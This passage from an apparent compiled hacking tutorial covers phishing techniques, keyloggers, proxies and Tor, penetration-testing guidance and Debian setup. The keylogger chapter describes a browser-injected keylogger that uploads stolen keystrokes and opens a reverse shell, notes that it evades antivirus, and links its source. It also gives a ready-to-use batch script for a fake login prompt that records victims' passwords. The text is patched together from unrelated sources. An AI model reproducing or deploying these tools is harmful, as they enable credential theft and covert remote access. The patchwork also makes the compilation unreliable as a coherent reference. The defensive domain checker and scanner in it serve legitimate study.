and expect to get a "localized" version of the website. 
For example, register gmail.com.cn and create a simplified-Chinese forged version of gmail.com. 
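A checker for the two lookalike tricks just described (one-character typos of the name, and the same name under another TLD), as an added example that is not from the notes. The TLD list and the hostnames it is run against are assumptions chosen for illustration.

```python
"""Lookalike-domain check: typo variants and alternate-TLD variants of a legitimate domain.
Added example, not from the original notes; COMMON_TLDS and the test hostnames are constructed."""
from __future__ import annotations

import string

COMMON_TLDS = ("com", "net", "org", "co", "cn", "com.cn", "in", "co.uk")


def split_domain(domain: str) -> tuple[str, str]:
    """'paypal.com' -> ('paypal', 'com'); 'gmail.com.cn' -> ('gmail', 'com.cn')."""
    name, _, tld = domain.lower().partition(".")
    return name, tld


def typo_variants(domain: str) -> set[str]:
    """Every one-edit typo of the name plus the name under each other TLD."""
    name, tld = split_domain(domain)
    out = set()
    for i in range(len(name)):
        out.add(f"{name[:i]}{name[i + 1:]}.{tld}")                     # letter dropped
        out.add(f"{name[:i + 1]}{name[i]}{name[i + 1:]}.{tld}")        # letter doubled
        for c in string.ascii_lowercase:                                # letter replaced: paypal -> paypel
            out.add(f"{name[:i]}{c}{name[i + 1:]}.{tld}")
    for i in range(len(name) - 1):                                      # adjacent letters swapped
        out.add(f"{name[:i]}{name[i + 1]}{name[i]}{name[i + 2:]}.{tld}")
    for alt in COMMON_TLDS:                                             # same name, other TLD: gmail.com.cn
        out.add(f"{name}.{alt}")
    out.discard(domain.lower())
    return out


def classify(host: str, legit_domains: list[str]) -> str:
    """'legitimate' for the domain or one of its subdomains, 'lookalike' for a variant, else 'unknown'."""
    host = host.lower().rstrip(".")
    if host.startswith("www."):
        host = host[4:]
    for legit in legit_domains:
        if host == legit or host.endswith("." + legit):
            return "legitimate"
    for legit in legit_domains:
        if host in typo_variants(legit):
            return "lookalike"
    return "unknown"


if __name__ == "__main__":
    for h in ("www.paypal.com", "paypel.com", "gmail.com.cn", "accounts.google.com"):
        print(f"{h:24} {classify(h, ['paypal.com', 'gmail.com'])}")
```

Note the order of the two checks: a hostname that ends in ".paypal.com" is a subdomain the real owner controls, so it is tested for legitimacy first; "paypal.com.cn" does not end that way and falls through to the variant test.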


Domain hijacking 

A more advanced pharming attack is domain hijacking. In domain hijacking, the DNS delegation record at the 
domain registrar is changed to a name server controlled by the attacker, so that all traffic can be redirected globally. 

Baidu, the largest search engine in China, was hijacked this way by the "Iranian Cyber Army" in January 2010. 

Malware 

Malware is software developed either to harm a computing device or to derive 
benefit from it to the detriment of its user. Malware can be used to collect confidential information directly, or to 
aid other phishing techniques. 

Client security products are able to detect and remove malware and other potentially unwanted programs, but 
phishers can repack their malware until it is no longer detected. Financial institutions and online game vendors 
distribute security programs to protect their customers. 



Phishing with malware 

Malware can be used to collect confidential information directly and send it to phishers. Keystrokes, 
screenshots, clipboard contents, and program activity can be collected. A password input box, where letters are 
shown as asterisks, can be easily read by a program running on the same machine. Malware can 
also display a fake user interface to actively collect information. Collected information can be sent automatically 
to phishers by email, to an FTP server, or over an IRC channel. 

Malware can also aid other phishing techniques. For web spoofing, it can install the phisher's CA certificate into the 
local computer's trusted CA list, so the forged site shows a valid-looking HTTPS indicator. For pharming, it can 
change the hosts file or DNS settings, or even run ARP spoofing on the local Ethernet. Malware can also enlist 
the computer into a botnet, to send spoofed emails or act as a web server for forged websites. 


Phishing through PDF Documents 

Adobe's Portable Document Format is one of the most popular and trusted document formats, and its 
portability and interoperability across platforms make PDF documents an attractive carrier for phishing. PDF is 
more than a static page description: it supports embedded JavaScript and document-level actions with real 
execution capabilities. Some of these functions can be misused by an attacker to design a PDF document that 
extracts the desired information from the victim. The potentially dangerous functions include OpenAction 
(run an action as soon as the document is opened) and SubmitForm (send the form field contents to a URL of 
the attacker's choosing). 

User Education 

Phishing exploits human vulnerabilities, so technical solutions can only block some of the 
phishing web sites. It doesn't matter how many firewalls, encryption packages, certificates, or two-factor 
authentication mechanisms an organization has if the person behind the keyboard falls for a phishing attack. A 
study on the effectiveness of several anti-phishing educational materials suggests that the materials 
reduced users' tendency to enter information into phishing web pages by 40%; however, 
some of the materials also slightly decreased participants' tendency to click on legitimate links. This 
leads to the belief that it is of paramount importance to find a new and efficient way of educating a large 
proportion of the population. The challenge lies in getting users' attention for these security tips and advice. 


Anti-Phishing Groups 

PhishTank, launched in October 2006, is a collaborative clearing house for data and information about phishing 
on the Internet. PhishTank employs a voting system that requires the community to vote "phish" or 
"not phish", reducing the possibility of false positives and improving 
the overall breadth and coverage of the phishing data. It also provides an open API for developers and 
researchers to integrate anti-phishing data into their applications at no charge. PhishTank is backed by 
OpenDNS, a public DNS resolver; OpenDNS uses PhishTank data to block phishing 
sites for its users. 

Formed in 2003, the Anti-Phishing Working Group (APWG) is an international consortium that brings together 
businesses affected by phishing attacks, security products and services companies, 
law enforcement agencies, government agencies, trade associations, regional international treaty organizations, 
and communications companies. 

FraudWatch International, a privately owned Internet security company established in 2003, provides a variety 
of anti-phishing products and services to protect financial service, e-commerce, and Internet hosting companies 
from phishing. 


21. Keyloggers 



Introduction 

Keyloggers have somewhat of a bad reputation in the technology world because they are most often associated with illegal 
spying and theft of personal and financial information. In reality, even though that is one of their main uses, they can be used 
for other, more appropriate and legal tasks. One clear example is a company whose security policy 
clearly states that workers' activities can be monitored; a keylogger can then be used to monitor an employee who is 
under suspicion of being a malicious insider. By logging his activity on his workstation the company may be able to 
confirm its suspicions or clear his name. Sometimes a simple and inexpensive tool like a keylogger may save companies 
millions in damages. The same concept may be applied to a more family-based use, like monitoring the activities of 
under-age children on the web, which may help protect the child from online predators and dangers. There are different 
types of keyloggers, divided into two main groups: hardware keyloggers and software keyloggers. Hardware keyloggers are 
small electronic devices used for capturing the data between the keyboard and the computer's keyboard port. 

Usually these devices have built-in memory where they store the keystrokes, which means the device must be retrieved by the 
person who installed it in order to obtain the information. An advantage of these keyloggers is that they are invisible 
to anti-virus software or scanners, since they work entirely in hardware. Software keyloggers hook into the target operating system, 
collect keystroke data, store it on disk or in remote locations, and send it to the 
attacker who installed them. 

The main advantage of software keyloggers compared to hardware keyloggers is that they can run for an indefinite 
amount of time while the information is transmitted remotely, eliminating the need to physically retrieve the device 
as is the case with hardware keyloggers. In this paper we will implement and explain our own custom-coded software 
keylogger. 


History 

Keylogging, often referred to as keyboard capturing or keystroke logging, is the action of recording or monitoring every 
key pressed on a keyboard. Even though these devices seem relatively new, keyloggers have already been 
with us for almost half a century. Their exact history cannot be known perfectly, since it is believed that they were first used 
by governments, which obviously do not release exact dates. In fact, some of the earliest cyber-espionage operations were 
keylogging operations: Soviet intelligence installed keyloggers in the US Embassy and Consulate buildings in Moscow and 
St. Petersburg in the 1970s, as a method of capturing information. Another 
anecdote about keylogging goes back to November 1983, when an early keystroke logger written by Perry Kivolowitz 
was posted to Usenet. This posting appears to have been a motivating factor in restricting access on UNIX systems. As 
can be seen, keylogging activities were initially tied to governmental monitoring. However, since the beginning of the 
21st century, keyloggers have become one of the most widely used surveillance technologies, within governments and 
beyond. 


Security 

Keyloggers used for security monitoring will record email, Internet use, chats, or anything else that requires a keystroke, 
capturing the information as text and/or screenshots. Keyloggers are usually classed as malware: they track the user's 
keystrokes, capture the characters that are pressed, and write the information to a file. Although both hardware and 
software keyloggers exist, software keyloggers are the ones widely used, because they are inexpensive and 
easier to deploy onto a computer. Each operating system needs its own adapted keylogger to suit its 
I/O mechanisms. Monitoring keystrokes is claimed to help with workflow, theft investigation, performance review, 
harassment prevention, tracing missing data, and preventing personal use. The workflow argument is that employees who 
know they are monitored stay on task, which weeds out the employees who want to go on Facebook or check personal 
email, which might cause a security leak. If there is a deleted file or missing 
information, security personnel can find which computer is missing the important information and figure out 
what went wrong. Keystroke counts are sometimes used as a crude measure of employee performance. If someone is being 
harassed, the logs increase the chances of finding out by whom and when the incident 
occurred. In the end this is supposed to prevent personal use and increase safety and security, with other benefits. 


Implementation 

The implementation and design of a keylogger are based upon many factors: the type of operating system, the intended 
lifespan of the keylogger, where it is installed and the size of its footprint on the machine. Infiltration depends on the 
target's operating system, or on attaching a physical keylogger device. Software keyloggers may be installed 
through a web browser exploit, for example. Security vulnerabilities vary depending on the browser being used, and the 
attacker can identify and exploit the weaknesses; such an attack may be delivered with JavaScript running on the client side. 

Once the keylogger is installed it can focus on its execution. Keyloggers implement each technique 
differently; most use a common execution technique known as hooking. A hook reroutes the information to the keylogger's 
own code and then returns it to the normal system routine. Hooks can be installed in any operating system for most 
functions. 

Well-made keyloggers can be executed in user mode of the operating system using a variety of hooks. 
Every keystroke passes through a message mechanism that transfers it from the keyboard device to the 
window procedures; during that process the hook can grab the information before it reaches the 
window procedures. Keyloggers can implement a global hook or a local one depending on which 
information the author wants to retrieve from the keystrokes. 


How our keylogger POC works: 

Our keylogger targets the Firefox application process (firefox.exe) on the victim's computer. 

However, it is not limited to Firefox and can be adjusted to any other popular browser with minor alterations to the 
source code. The keylogger is structured as a client-server model. 

Client 

The client consists of a library (library.dll) and an executable (loader.exe). 

The library contains most of the client-side keylogger code as well as an add-on that allows the attacker to spawn a shell on 
the victim and execute commands remotely. 

More specifically, once the library is loaded in the target process, it intercepts any calls to the GetMessage() Windows 
API function and filters/logs any key-press messages. These messages are saved to a temporary log file, which is 
uploaded to the server once enough key presses have been collected. 

The advantages of injecting a library into a process instead of having a standalone executable do the keylogging are 
obvious. First, any packets generated by the keylogger will appear to come from the target process (firefox.exe in this 
case). Second, a library will not show up in Task Manager the way an executable will. 

The loader executable performs a simple task: load (inject) the library into the target process (firefox.exe) and exit. The 
loader waits until the target process is running before performing the injection. 



Keylogger Source Code Link - 
https://github.com/Erickbarrera/SimpleKeylogger 


Server 

The server consists of a few PHP scripts that facilitate the viewing and uploading of Keylogger logs. The Keylogger client 
uses the script "upload. php" to post the log files to the server. The "upload. php" script takes care of saving the file and 
renaming it for easy access later. 

The server provides the attacker a single place to look at all the Keylogger client's logs and the date on which they were 
uploaded. 

An optional add-on is to have a server running a tool like netcat. The Keylogger client library is always attempting to 
connect to a predefined IP address and PORT in order to allow a listening program full access to a shell in the victim's 
computer. Netcat is one of many programs that can be used to listen for the Keylogger library connection attempts. 

Although this proof of concept can be further improved, it provides the full functionality of a basic Keylogger with a few 
nice features. 
As shown in the results above, the antivirus software is completely oblivious to our keylogger and fails to detect it. This 
undetectability can be attributed to the fact that our code and file signatures have not yet been added to the antivirus 
vendors' definition databases: signature-based detection only catches what has already been seen. Behavioural engines that 
flag DLL injection into a browser, API hooking, or a process repeatedly connecting to one fixed address are not defeated by a 
fresh sample in the same way. 

How To Create a Simple Login-Prompt "Keylogger" - 

Step By Step - 

Step 1. Open Notepad. 
Step 2. Copy the code below. Note that this script does not hook the keyboard at all: it is a fake login prompt that 
records whatever the user types into a log file and then starts the real program. 

@echo off 
color a 
title Login 

cls 

echo Please Enter Email Address And Password 

echo. 

echo. 

cd /d "C:\keylogs" 
set /p user=Username: 
set /p pass=Password: 

echo Username="%user%" Password="%pass%" >> Log.txt 

rem replace "Program Here" with the program the user expects to see after logging in 
start "" "Program Here" 

exit 


Step 3. Save it as keylogger.bat. 

Step 4. Create a new folder named keylogs in the root of the C: drive. 
Note: if the folder is not named keylogs (so that C:\keylogs exists), the cd command fails and Log.txt is written to 
whatever the current directory happens to be. 

Step 5. Open keylogger.bat; your "keylogger" is now ready, as shown below. 

Note: this trick is only for research and ethical purposes. If you use this script for any illegal purpose, we are not 
responsible for it; you are responsible for any damage and misuse. 


22. IP Hiding 


Types of Proxy Server - 

Proxy servers are categorised by how the indirect connection to the network is made. 

1. Web-based proxy - A website that fetches other pages on your behalf, giving access to otherwise restricted network 
resources through its own interface. 

Ex - 1. Kproxy 

2. Hide My Ass 

2. Manual proxy - An HTTP or SOCKS proxy address entered by hand into the browser's network settings. Manual proxies 
are classified by how much they reveal to the destination server: 

a) Transparent - announces that it is a proxy and forwards the client's real IP address (for example in X-Forwarded-For). 

b) Anonymous - announces that it is a proxy but hides the client's IP address. 

c) Elite (high anonymity) - neither announces itself nor forwards the client IP; the destination sees only the proxy's address. 

3. Application-based proxy - a proxy network used through a dedicated application (see below). 

1 - How To Surf Without Revealing Your IP Address 
Step By Step - 

1. Open a browser and go to kproxy.com. 

2. Type google.com in the proxy's address box. 

3. The destination site now sees Kproxy's IP address instead of yours. Remember that the proxy operator sees everything 
you send through it, including any credentials typed into pages that are not served over HTTPS. 

2 - How To Hide My Location On The Internet 
Step By Step - 

1. Open Mozilla Firefox and go to proxy-list.org. 

2. Pick a proxy in the country you want websites to see you coming from, and note its IP address and port. 

3. In Firefox open Tools > Options (Preferences), then Advanced > Network > Settings, and select Manual proxy configuration. 

4. Enter the proxy's IP address in the HTTP Proxy field. 

5. Enter its port, tick "Use this proxy server for all protocols" so that HTTPS and FTP do not bypass the proxy, and click OK. 

Public proxy lists are run by unknown third parties: a free proxy can log, alter or inject content into any unencrypted 
traffic you pass through it, so never log in to anything over plain HTTP through one. 

Application-Based Proxy - 

Rather than configuring individual proxy servers by hand in the browser, a number of applications route traffic through a 
proxy network in which every node hides the client's address, i.e. all of them behave as elite proxies towards the destination. 

The most popular such project is the Tor Browser (formerly distributed as the Vidalia bundle), which sends traffic through the 
Tor network: each connection is relayed through three nodes, and the destination sees only the exit relay's address. 

How To Hide My IP With an Application - 

1. Download the Tor Browser. 

2. Install it. 

3. Open the Tor Browser and open google.com. 

4. The site now sees a Tor exit relay's IP address, not yours. Tor hides your address from the destination and the 
destination from your ISP, but the exit relay can read any traffic that is not itself encrypted (HTTPS), and logging in to a 
personal account over Tor links that session back to you regardless of the IP address shown. 



23. Penetration Testing 

Scanning - The process of gathering information about the target machine. 

Address - Uniquely identifies a host in the network. 

IP Address scanners - 

1. LAN IP scanner 

2. Web IP scanner 

Server - 

1. Domain 

2. Static IP 

Penetration Testing Tools - 

1. Nmap 

2. Nessus 

Targeted services 

By far the most common service running on port 25 is SMTP (Simple Mail Transfer Protocol), which is widely used to 
transfer electronic mail from one network to another; however, many trojan services also abuse this port, so a listener on 
25 should be fingerprinted rather than assumed to be a mail server. 



Description 


Sendmail has historically been the most common application listening on port 25. Its purpose is to send and receive 
electronic mail between computers. 
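The point of the two paragraphs above is that a port number alone proves nothing: a listener on 25 is usually a mail server, but only the service's own greeting tells you what is really there. The following added example (not taken from Nmap, Nessus or any other tool named on this page) does the first scanning step by hand: connect, read the banner the service volunteers, and pull the software name and version out of an SMTP 220 greeting. To stay self-contained and offline it starts a fake SMTP listener on 127.0.0.1 with a constructed Sendmail-style banner; the hostname, version string and timestamp in that banner are made up. Point scan_ports() at a host you do not own only with written authorisation.

```python
"""TCP port scan with banner grabbing and SMTP fingerprinting.
Added example; the fake listener and its banner are constructed."""
import re
import socket
import threading

# Constructed banner in the style of a Sendmail greeting; hostname, version and
# date are made up for this example.
FAKE_BANNER = (b"220 mail.example.test ESMTP Sendmail 8.14.4/8.14.4; "
               b"Mon, 10 Nov 2014 18:21:56 +0100\r\n")


def start_fake_smtp(banner=FAKE_BANNER):
    """Start a one-shot listener on 127.0.0.1 (ephemeral port) that sends
    `banner` to the first client and closes. Returns the port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        conn.sendall(banner)
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def grab_banner(host, port, timeout=1.0):
    """Connect and wait briefly for the service to speak first.
    Returns ('open', banner_text) or ('closed', '')."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            try:
                data = s.recv(1024)
            except socket.timeout:
                data = b""  # open, but the service waits for the client to speak
        return "open", data.decode("latin-1").strip()
    except OSError:  # refused, timed out during connect, unreachable
        return "closed", ""


# Common MTA names, followed by an optional version number.
MTA_RE = re.compile(
    r"\b(Sendmail|Postfix|Exim|Microsoft ESMTP MAIL Service)\b(?:[ /]*([\d.]+))?",
    re.IGNORECASE)


def identify_smtp(banner):
    """(software, version) from an SMTP 220 greeting; (None, None) if the
    banner is not SMTP; ('unknown', None) for an SMTP banner we cannot name."""
    if not banner.startswith("220"):
        return None, None
    m = MTA_RE.search(banner)
    if not m:
        return "unknown", None
    return m.group(1), m.group(2)


def scan_ports(host, ports):
    """Return {port: (state, software, version)} for each port scanned."""
    results = {}
    for port in ports:
        state, banner = grab_banner(host, port)
        software, version = identify_smtp(banner) if state == "open" else (None, None)
        results[port] = (state, software, version)
    return results


if __name__ == "__main__":
    p = start_fake_smtp()
    print(scan_ports("127.0.0.1", [p]))
```

A banner is self-reported and trivially forged (honeypots and hardened mail servers routinely lie in it), so treat the version it announces as a lead to verify, not as a finding.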


History of Sendmail 

Many people have argued that electronic mail, or email, is the most useful application of the Internet. Sendmail is the 
underlying application that the majority of networks used to deliver mail into and out of their networks. Regardless of 
which email client you use (Outlook, Outlook Express, Eudora, etc.), the mail you receive or send will most likely pass 
through a Sendmail host somewhere along the way. Sendmail evolved from Eric Allman's Delivermail program, which used 
FTP to transfer mail over ARPANET (Advanced Research Projects Agency Network), in response to the then-new TCP/IP and 
SMTP protocols. Sendmail was made available in April 1983 as part of 4.1c BSD Unix (reference 
http://chris.dci-uk.com/print.php?sid=26). Sendmail set itself apart from the other mail programs of the time by being 
flexible enough to accept incoming mail from different types of systems. Instead of rejecting mail for 'incorrect protocols', 
it would massage the message into a format it could deal with and pass it on. This flexibility came at a cost: complexity. 
Sendmail is a monolithic program (all functionality is in one program, which for years ran with root privileges, a 
combination that gave it a long history of remotely exploitable bugs), and its configuration file can be very cryptic, as 
you can see from the snippet below. 

Snippet from a sendmail.cf file: 

######################### 
#   Format of headers   # 
######################### 

H?P?Return-Path: <$g> 
HReceived: $?sfrom $s $.$?_($?s$|from $.$_) 
        $.$?{auth_type}(authenticated$?{auth_ssf} bits=${auth_ssf}$.) 
        $.by $j $?r with $r$. id $i$?{tls_version} 
        (version=${tls_version} cipher=${cipher} bits=${cipher_bits} verify=${verify})$.$?u 
        for $u; $|; 
        $.$b 
H?D?Resent-Date: $a 
H?D?Date: $a 
H?F?Resent-From: $?x$x <$g>$|$g$. 
H?F?From: $?x$x <$g>$|$g$. 
H?x?Full-Name: $x 
# HPosted-Date: $a 
# H?l?Received-Date: $b 
H?M?Resent-Message-Id: <$t.$i@$j> 
H?M?Message-Id: <$t.$i@$j> 


Protocol 

Sendmail uses SMTP to transport mail from one computer to another over a computer network. SMTP is the 
protocol developed with the objective of transferring electronic mail reliably and efficiently. 

Terminology 

The following terms are used throughout this document: 

■ Penetration tester, tester, or team: The individual(s) conducting the penetration test for the entity. They 
may be a resource internal or external to the entity. 

■ Application-layer testing: Testing that typically includes websites, web applications, thick clients, or other 
applications. 


■ Network-layer testing: Testing that typically includes external/internal testing of networks (LANs/VLANs), the links 
between interconnected systems, wireless networks, and social engineering. 

■ White-box testing: Testing performed with knowledge of the internal structure/design/implementation of the 
object being tested. 

■ Grey-box testing: Testing performed with partial knowledge of the internal structure/design/implementation 
of the object being tested. 

■ Black-box testing: Testing performed without prior knowledge of the internal 
structure/design/implementation of the object being tested. 

■ National Vulnerability Database (NVD): The U.S. government repository of standards-based vulnerability 
management data. This data enables automation of vulnerability management, security measurement, and 
compliance (e.g., FISMA). 

■ Common Vulnerability Scoring System (CVSS): Provides an open framework for communicating the 
characteristics and impacts of IT vulnerabilities. 


Application-Layer and Network-Layer Testing 

Any software written by or specifically for the organization that is part of the penetration test scope should be 
subject to both an application and network-layer penetration test. This assessment helps identify security 
defects that result from either insecure application design or configuration, or from employing insecure coding 
practices or security defects that may result from insecure implementation, configuration, usage, or maintenance 
of software. 



The remediation of vulnerabilities identified during an application-layer assessment may involve redesigning or 
rewriting insecure code. The remediation of vulnerabilities identified during a network-layer assessment typically 
involves either reconfiguring or updating software. In some instances, remediation may include deploying a 
secure alternative to insecure software. 


Separate Testing Environment 

Because of the nature and the intent of penetration testing, such testing in a production environment during 
normal business hours may impact business operations, and attempts to avoid disruption may increase the 
time, resources and complexity of the testing. This is especially important for high availability systems that may 
be impacted by penetration testing in a production environment. To avoid disruptions and to speed up testing, a 
separate environment that is identical to the production environment may be used for testing instead of the 
production environment. The penetration tester would need to ensure the same application and network-layer 
controls as production exist in the testing environment. This may be accomplished through methods to map out 
the production environment to verify it matches the testing environment. This should be included in the rules of 
engagement. All exploitable vulnerabilities identified during the testing must be corrected on production systems 
and testing repeated to verify that security weaknesses have been addressed. 


Social Engineering 

Social engineering is the attempt to gain information, access, or introduce unauthorized software into the 
environment through the manipulation of end users. PCI DSS v3.0 reconfirms testing by requiring industry-accepted 
penetration testing approaches (many of which include social engineering as part of their approach) and an approach 
to penetration testing that "considers the threats and vulnerabilities experienced by merchants in the last 12 months." 
This may include social-engineering attacks as a method used for introducing malware into the environment. 

Social-engineering tests are an effective method of identifying risks associated with end users' failure to follow 
documented policies and procedures. There is no blanket approach to social-engineering engagements. If an organization 
chooses to include social-engineering testing as part of its annual security review, the tests performed should be 
appropriate for the size and complexity of the organization and should consider the maturity of the organization's security 
awareness program. These tests might include in-person, non-technological interactions such as persuading someone to 
hold open a door, remote interactions such as having someone provide or reset a password, or convincing the end user to 
open a vulnerable e-mail attachment or hyperlink. 


Methodology 

To ensure a successful penetration test, there are several activities and processes to be considered beyond the 
testing itself. This section provides guidance for these activities and is organized by the typical phases that 
occur during a penetration test: pre-engagement, engagement, and post-engagement. 


Scoping 



The organization being assessed is responsible for defining the cardholder data environment (CDE) and any critical 
systems. It is recommended that the organization work with the tester and, where applicable, the assessor to verify that no 
components are overlooked and to determine whether any additional systems should be included in scope. The 
scope of the penetration test should be representative of all access points, critical systems, and segmentation 
methodologies for the CDE. 


Engagement: Penetration Testing 

Each environment has unique aspects and technology that require the tester to select the most appropriate approach 
and tools for the penetration test. It is beyond the scope of this document to define or 
outline which approach, tools, or techniques are appropriate for each penetration test. Instead, the following 
sections provide high-level guidance on considerations for the approach, tools, or techniques. 

Penetration testing is essentially a manual endeavor. In many cases, tools exist that can aid the tester in 
performing the test and alleviate some of the repetitive tasks. Judgment is required in selecting the appropriate 
tools and in identifying attack vectors that typically cannot be identified through automated means. 

Penetration testing should also be performed from a suitable location, with no restrictions on ports or services by 
the Internet provider. For example, a penetration tester utilizing Internet connectivity provided to consumers and 
residences may have SMTP, SNMP, SMB, and other ports restricted by the Internet provider to minimize impact 
by viruses and malware. If testing is performed by a qualified internal resource, the test should also be performed 
from a neutral Internet connection unaffected by access controls that might be present in the corporate or support 
environments. 



Application Layer 


The penetration tester should perform testing from the perspective of the defined roles of the application. The 
organization is strongly encouraged to supply credentials to allow the tester to assume the required roles. This 
will allow the tester to determine whether, at any given role, the user could escalate privileges or otherwise gain access 
to data they are not explicitly allowed to access. 

In instances where the organization has created new accounts for the tester to use, it is important that the 
organization ensure all roles and applicable security in the application have been set up to allow the tester to 
effectively test all functionality. 

In instances where a web application utilizes a backend API and the API is in scope, it is recommended that the 
API be tested independently of the web application. 


Network Layer 

Since most protocols are well defined and have standard modes of interaction, network-layer testing is more 
suitable for automated testing. This makes automation the first logical step in a network-layer test. Because of 
such standardization, tools may be used to quickly identify a service, the version of the software, test for 
common misconfigurations, and even identify vulnerabilities. Automated tests can be performed much faster 
than could be expected of a human. However, simply running an automated tool does not satisfy the penetration 
testing requirement. Automated tools cannot interpret vulnerabilities, misconfigurations, or even the services 
exposed to assess the true risk to the environment. The automated tool only serves as a baseline indication of the 
potential attack surface of the environment. The penetration tester must interpret the results of any automated 
tools and determine whether additional testing is needed. 

Using the documentation provided by the organization during the pre-engagement, the tester should: 

■ Verify that only authorized services are exposed at the CDE perimeter. 

■ Attempt to bypass authentication controls from all network segments where authorized users access the 
CDE, as well as segments not authorized to access the CDE. 


High-Level Network Diagram 

[Figure not reproduced.] 

Main vulnerabilities identified were: 


■ Man in the middle - It was possible to perform a man-in-the-middle attack using ARP poisoning, but the 
tester was not able to extract any sensitive information that could provide information on how to gain access to 
ODIN or THOR. 

■ Weak password policy implemented - Weak password settings on local servers on the BALDER network 
were used to compromise accounts on this network. The tester was not able to use these accounts to gain 
access to ODIN or THOR. As these servers are not in PCI scope, the weak password policy was not considered 
to have an impact on compliance. 

■ Old user accounts were compromised - The tester was able to compromise user accounts that had been 
created but never used on the BALDER network. The compromised accounts did not grant access to 
ODIN or THOR. 

■ Others - Other vulnerabilities were noted, such as DNS zone transfers, outdated software and unencrypted 
protocols in use; these vulnerabilities were all related to the LOKE or BALDER networks and did not grant access 
to ODIN or THOR even when exploited. 


Example Store Network Diagram 

[Figure not reproduced.] 


Example Corporate Network Diagram 

[Figure; labels recoverable from the diagram: INTERNET; ISP Public IP 229.x.x.104; Firewall 1; Corporate IT Network - 
10.15.0.0/24 (workstations, VPN to stores); Corporate General Users Network - 10.10.0.0/24 (workstations, Wireless AP).] 


24. Linux Basics 


Distributions - 

A Linux distribution is a collection of (usually open source) software on top of a Linux kernel. A distribution (or, for short, 
distro) can bundle server software, system management tools, documentation and many desktop applications in a central, 
secure software repository. A distro aims to provide a common look and feel, secure and easy software management and 
often a specific operational purpose. 

Red Hat 

Red Hat is a billion-dollar commercial Linux company that puts a lot of effort into developing Linux. They have 
hundreds of Linux specialists and are known for their excellent support. 

The source code of their products (Red Hat Enterprise Linux and Fedora) is freely available and Fedora is free to download, 
while RHEL binaries, updates and support are distributed under a paid subscription. Red Hat Enterprise Linux (RHEL) 
is well tested before release and supported for up to ten years after release, whereas Fedora is a distro with faster updates 
but without support. 

Ubuntu 

Canonical started sending out free compact discs with Ubuntu Linux in 2004 and quickly became popular for home users 
(many switching from Microsoft Windows). Canonical wants Ubuntu to be an easy to use graphical Linux desktop without 
need to ever see a command line. Of course they also want to make a profit by selling support for Ubuntu. 

Debian 

There is no company behind Debian. Instead there are thousands of well organised developers that elect a Debian 
Project Leader every two years. Debian is seen as one of the most stable Linux distributions. It is also the basis of 
every release of Ubuntu. Debian comes in three versions: stable, testing and unstable. Every Debian release is named 
after a character in the movie Toy Story. 

Other 

Distributions like CentOS, Oracle Enterprise Linux and Scientific Linux are based on Red Hat Enterprise Linux and share 
many of the same principles, directories and system administration techniques. Linux Mint, Edubuntu and many other 
*buntu named distributions are based on Ubuntu and thus share a lot with Debian. There are hundreds of other Linux 
distributions. 



GNU General Public License - 


More and more software is being released under the GNU GPL (in 2006 Java was released under the GPL). This license 
(v2 and v3) is the main license endorsed by the Free Software Foundation. Its main characteristic is the copyleft principle: 
everyone in the chain of consecutive users, in return for the right of use that is assigned, must distribute the improvements 
they make to the software and their derivative works under the same conditions to other users, if they choose to 
distribute such improvements or derivative works. In other words, software which incorporates GNU GPL software needs 
to be distributed in turn as GNU GPL software (or compatible, see below). It is not possible to incorporate copyright-protected 
parts of GNU GPL software in a proprietary licensed work. The GPL has been upheld in court. 


Downloading 

All these screenshots were made in November 2014, which means Debian 8 was still in 'testing' (but in 'freeze', so there 
will be no major changes when it is released). 


Download Debian here: 




Installing Debian 8 

Create a new virtualbox machine (I already have five, you might have zero for now). Click the New button to start a wizard 
that will help you create a virtual machine. 




The machine needs a name, this screenshot shows that I named it server42. 









[Screenshot: VirtualBox "Create Virtual Machine" wizard, "Name and operating system" step. Name: server42, 
Type: Linux, Version: Debian (64 bit).] 



Most of the defaults in Virtualbox are ok. 


512MB of RAM is enough to practice all the topics in this book. 






We do not care about the virtual disk format. 




Choosing dynamically allocated will save you some disk space (for a small performance hit). 




8GB should be plenty for learning about Linux servers. 




This finishes the wizard. Your virtual machine is almost ready to begin the installation. 

First, make sure that you attach the downloaded .iso image to the virtual CD drive (by opening Settings > Storage and 
clicking the round CD icon). 



[Screenshot: "server42 - Settings", Storage tab. Storage Tree: Controller: IDE with the debian-testing-amd64 .iso attached; 
Controller: SATA with server42.vdi. Attributes: Name IDE, Type PIIX4, Use Host I/O Cache ticked.] 


Now boot the virtual machine and begin the actual installation. After a couple of seconds you should see a screen similar to 
this. Choose Install to begin the installation of Debian. 






[Screenshot: "server42 [Running] - Oracle VM VirtualBox" showing the Debian GNU/Linux installer boot menu: Install, 
Graphical install, Advanced options, Help, Install with speech synthesis. "Press ENTER to boot or TAB to edit a menu entry".] 


First select the language you want to use. 




Choose your country. This information will be used to suggest a download mirror. 



Choose the correct keyboard. On servers this is of no importance since most servers are remotely managed via ssh. 








Enter a hostname (with an FQDN to set the DNS domain name). 
If you want . . . 








Give the root user a password. Remember this password (or use hunter2). 








It is advised to also create a normal user account. I don't give my full name; Debian 8 accepts an identical username and 
full name, paul. 








"Use entire disk" refers to the virtual disk that you created before in VirtualBox. 







Again the default is probably what you want. Only change partitioning if you really know what you are doing. 








Accept the partition layout (again only change if you really know what you are doing). 



This is the point of no return, the magical moment where pressing yes will forever erase data on the (virtual) computer. 



Software is downloaded from a mirror repository, preferably choose one that is close by (as in the same country). 







This setup was done in Belgium. 







Leave the proxy field empty (unless you are sure that you are behind a proxy server). 







Choose whether you want to send anonymous statistics to the Debian project (it gathers data about installed packages). You 
can view the statistics here http://popcon.debian.org/. 







Choose what software to install, we do not need any graphical stuff for this training. 



The latest versions are being downloaded. 









Say yes to install the bootloader on the virtual machine. 



Booting for the first time shows the grub screen. 



A couple of seconds later you should see a lot of text scrolling off the screen (dmesg), after which you are presented with 
this getty and are allowed your first logon. 







You should now be able to log on to your virtual machine with the root account. Do you remember the password? Was it 
hunter2? 







The screenshots in this book will look like this from now on. You can just type those commands in the terminal (after you 
have logged on). 

root@server42:~# who am i 
root     tty1         2014-11-10 18:21 
root@server42:~# hostname 
server42 
root@server42:~# date 
Mon Nov 10 18:21:56 CET 2014 


vi Commands - 


replace and delete - 

x - delete the character below the cursor 
X - delete the character before the cursor 
